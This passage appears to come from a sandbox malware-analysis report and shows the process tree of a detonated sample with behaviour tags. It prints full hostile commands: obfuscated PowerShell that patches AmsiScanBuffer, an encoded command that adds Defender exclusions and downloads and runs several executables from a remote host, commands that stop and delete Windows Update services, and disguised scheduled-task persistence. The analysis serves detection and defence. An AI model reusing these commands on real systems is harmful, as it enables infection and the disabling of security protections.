@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$QdDUKgMhCpK=$MEyvpdGEQvpuz.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+'M'+'o'+''+[Char](100)+''+[Char](117)+'le'+'H'+''+'a'+''+[Char](110)+''+'d'+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+'r'+'n'+'e'+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+'d'+''+'l'+''+[Char](108)+'')));$mDZelZfuzhRCAq=$dlwtQroHtDyLvJ.Invoke($Null,@([Object]$QdDUKgMhCpK,[Object](''+[Char](76)+''+[Char](111)+'a'+[Char](100)+''+'L'+''+'i'+''+[Char](98)+'ra'+[Char](114)+''+'y'+'A')));$ZuojooxGrKwfppGKi=$dlwtQroHtDyLvJ.Invoke($Null,@([Object]$QdDUKgMhCpK,[Object](''+[Char](86)+''+[Char](105)+'r'+[Char](116)+''+[Char](117)+''+'a'+''+[Char](108)+''+[Char](80)+''+[Char](114)+''+[Char](111)+'t'+[Char](101)+''+[Char](99)+'t')));$NkBLXFQ=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($mDZelZfuzhRCAq,$jWmMooSqutLvbSCCpCO).Invoke('a'+[Char](109)+''+[Char](115)+'i'+[Char](46)+'d'+[Char](108)+'l');$XaTgSWOWqOWIYiDiK=$dlwtQroHtDyLvJ.Invoke($Null,@([Object]$NkBLXFQ,[Object](''+[Char](65)+''+'m'+''+'s'+''+'i'+''+[Char](83)+''+'c'+''+[Char](97)+''+[Char](110)+''+'B'+''+'u'+'ff'+[Char](101)+''+[Char](114)+'')));$pGXkLfTnZh=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ZuojooxGrKwfppGKi,$iFkBLwbNucYFIqDyBmOftv).Invoke($XaTgSWOWqOWIYiDiK,[uint32]8,4,[ref]$pGXkLfTnZh);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$XaTgSWOWqOWIYiDiK,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ZuojooxGrKwfppGKi,$iFkBLwbNucYFIqDyBmOftv).Invoke($XaTgSWOWqOWIYiDiK,[uint32]8,0x20,[ref]$pGXkLfTnZh);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+[Char](70)+''+'T'+''+[Char](87)+''+[Char](65)+''+[Char](82)+'E').GetValue('d'+[Char](105)+''+'a'+'l'+[Char](101)+''+'r'+''+'s'+''+'t'+'a'+[Char](103)+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3916 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3364
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:MTByPtOBIsyf{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$WLrWkWTRVUjJCG,[Parameter(Position=1)][Type]$PIQWdiUtBy)$rTMvMQRQFax=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+'l'+[Char](101)+''+'c'+''+[Char](116)+''+[Char](101)+'d'+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('In'+[Char](77)+''+[Char](101)+''+'m'+'o'+[Char](114)+''+[Char](121)+''+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType('M'+'y'+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+''+[Char](103)+'a'+[Char](116)+'eT'+[Char](121)+''+[Char](112)+''+[Char](101)+'','C'+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+'S'+[Char](101)+''+[Char](97)+'l'+[Char](101)+'d'+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+'i'+'C'+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+',A'+[Char](117)+'t'+'o'+'C'+'l'+''+[Char](97)+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$rTMvMQRQFax.DefineConstructor('R'+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+'c'+''+[Char](105)+''+'a'+''+'l'+''+'N'+''+[Char](97)+''+[Char](109)+''+[Char](101)+','+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+'P'+''+[Char](117)+''+'b'+'li'+'c'+'',[Reflection.CallingConventions]::Standard,$WLrWkWTRVUjJCG).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+'t'+[Char](105)+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+'ana'+[Char](103)+''+[Char](101)+''+[Char](100)+'');$rTMvMQRQFax.DefineMethod(''+'I'+''+'n'+''+[Char](118)+''+[Char](111)+'k'+[Char](101)+'',''+[Char](80)+'ub'+'l'+''+'i'+''+'c'+','+'H'+''+'i'+'d'+'e'+''+'B'+'yS'+[Char](105)+'g'+[Char](44)+'N'+[Char](101)+''+'w'+''+[Char](83)+''+'l'+''+'o'+''+[Char](116)+',Vi'+'r'+''+[Char](116)+''+[Char](117)+'a'+'l'+'',$PIQWdiUtBy,$WLrWkWTRVUjJCG).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+'t'+''+'i'+'m'+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+'d'+'');Write-Output $rTMvMQRQFax.CreateType();}$gqftNOfLNdsTg=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+'t'+''+[Char](101)+'m'+'.'+''+'d'+'l'+'l'+'')}).GetType(''+'M'+''+[Char](105)+''+'c'+''+[Char](114)+''+'o'+''+[Char](115)+''+[Char](111)+'f'+'t'+'.W'+[Char](105)+''+[Char](110)+''+[Char](51)+'2.U'+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+'g'+[Char](113)+'f'+[Char](116)+''+[Char](78)+''+[Char](79)+''+'f'+''+[Char](76)+''+[Char](78)+''+[Char](100)+''+[Char](115)+''+[Char](84)+''+[Char](103)+'');$DpzZTwbAOZrBoH=$gqftNOfLNdsTg.GetMethod('D'+[Char](112)+''+'z'+''+[Char](90)+''+'T'+''+[Char](119)+'b'+[Char](65)+'O'+[Char](90)+''+[Char](114)+''+[Char](66)+''+'o'+''+'H'+'',[Reflection.BindingFlags]'P'+[Char](117)+''+[Char](98)+'lic'+[Char](44)+''+[Char](83)+''+'t'+'a'+[Char](116)+''+[Char](105)+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$KPvGsKRjoqTSJzbytxj=MTByPtOBIsyf @([String])([IntPtr]);$QaeFlqOBJKtOVYeNqgpIwb=MTByPtOBIsyf @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ZrSwHqamEXq=$gqftNOfLNdsTg.GetMethod(''+'G'+'e'+[Char](116)+'M'+[Char](111)+'d'+'u'+''+[Char](108)+''+[Char](101)+'Ha'+'n'+''+'d'+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+'ne'+[Char](108)+'32'+[Char](46)+''+'d'+''+'l'+''+[Char](108)+'')));$TAzoCUEZlZflZv=$DpzZTwbAOZrBoH.Invoke($Null,@([Object]$ZrSwHqamEXq,[Object](''+'L'+'o'+[Char](97)+''+'d'+''+'L'+''+'i'+''+[Char](98)+''+'r'+'ar'+[Char](121)+''+[Char](65)+'')));$lmxCVeANJmtkUoAaM=$DpzZTwbAOZrBoH.Invoke($Null,@([Object]$ZrSwHqamEXq,[Object](''+[Char](86)+''+[Char](105)+''+'r'+''+'t'+''+[Char](117)+'a'+[Char](108)+'P'+[Char](114)+''+[Char](111)+''+[Char](116)+'e'+[Char](99)+''+[Char](116)+'')));$RFxZGwl=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($TAzoCUEZlZflZv,$KPvGsKRjoqTSJzbytxj).Invoke('a'+'m'+''+'s'+''+[Char](105)+''+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'');$XrXXvOMLTweGFEvRb=$DpzZTwbAOZrBoH.Invoke($Null,@([Object]$RFxZGwl,[Object](''+[Char](65)+''+'m'+''+[Char](115)+''+[Char](105)+'S'+[Char](99)+''+'a'+''+[Char](110)+''+'B'+''+'u'+''+[Char](102)+'fer')));$pdZJifAPSg=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($lmxCVeANJmtkUoAaM,$QaeFlqOBJKtOVYeNqgpIwb).Invoke($XrXXvOMLTweGFEvRb,[uint32]8,4,[ref]$pdZJifAPSg);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$XrXXvOMLTweGFEvRb,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($lmxCVeANJmtkUoAaM,$QaeFlqOBJKtOVYeNqgpIwb).Invoke($XrXXvOMLTweGFEvRb,[uint32]8,0x20,[ref]$pdZJifAPSg);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+'F'+[Char](84)+''+'W'+'A'+[Char](82)+''+[Char](69)+'').GetValue('d'+[Char](105)+''+[Char](97)+''+[Char](108)+'e'+[Char](114)+'s'+'t'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:364 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4908
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exeC:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe2⤵
- Executes dropped EXE
PID:4816
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1056
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1200
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
PID:1244
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1604
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1784
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2348
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2360
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2484
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2496
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2708
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2768
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2776
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2760
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:776
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3396
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3232
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3232 -s 9882⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:2996
-
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3044
-
C:\Users\Admin\AppData\Local\Temp\77d29818be0d01c38545baa0bd4551c6853c224b.exe"C:\Users\Admin\AppData\Local\Temp\77d29818be0d01c38545baa0bd4551c6853c224b.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4100 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:1796 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdABhACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYwBqAHIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBjAHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYgB4AHoAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcALAAgADwAIwBhAGEAYQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGMAZAB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGwAcwBqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQApADwAIwB3AGQAcwAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBuAGUAdwAyAC4AZQB4AGUAJwAsACAAPAAjAGoAYgBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcQB6AGEAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAYwBlAGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQApADwAIwBtAGIAegAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBqAHcAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGYAcQB0ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAYgBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAHUAYQB3ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcALAAgADwAIwBoAGkAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHQAcAB2ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHQAcgBzACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQApADwAIwBqAGwAcAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBkAGMAcgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZAB3AHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwApADwAIwBoAHgAZwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBwAGcAeQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAbQBkAGYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQA8ACMAdgBoAGUAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZQBxAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGoAbABkACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApADwAIwB5AGkAbQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBjAGEAZQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcABrAGoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBtAGEAcgB0AEQAZQBmAFIAdQBuAC4AZQB4AGUAJwApADwAIwBoAGYAZAAjAD4A"4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1324 -
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"5⤵
- Executes dropped EXE
PID:1344
-
-
C:\Users\Admin\AppData\Local\Temp\new2.exe"C:\Users\Admin\AppData\Local\Temp\new2.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1312 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4280
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1312 -s 1406⤵
- Program crash
PID:4856
-
-
-
C:\Users\Admin\AppData\Local\Temp\SysApp.exe"C:\Users\Admin\AppData\Local\Temp\SysApp.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2188 -
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"6⤵
- Creates scheduled task(s)
PID:3568 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:4376
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2208
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4100 -s 3003⤵
- Program crash
PID:4808
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2276
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
PID:5024 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:984
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:3312
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:2228
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:2952
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:1832
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:1020
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:1592
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
PID:1444
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:3508
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:4748
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#thpqznhs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4808
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵PID:4804
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4248
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4248 -s 3922⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1264
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4684
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:4504
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:1432
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:4468
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:1216
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p1⤵PID:4968
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵PID:4940
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:960
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s W32Time1⤵PID:3656
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3716
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵PID:2668
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵PID:2656
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2144
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2108
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1996
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2036
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1980
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1948
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1940
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1824
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1676
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s FontCache1⤵PID:1660
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1644
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1528
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1452
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1436
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1404
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1356
-
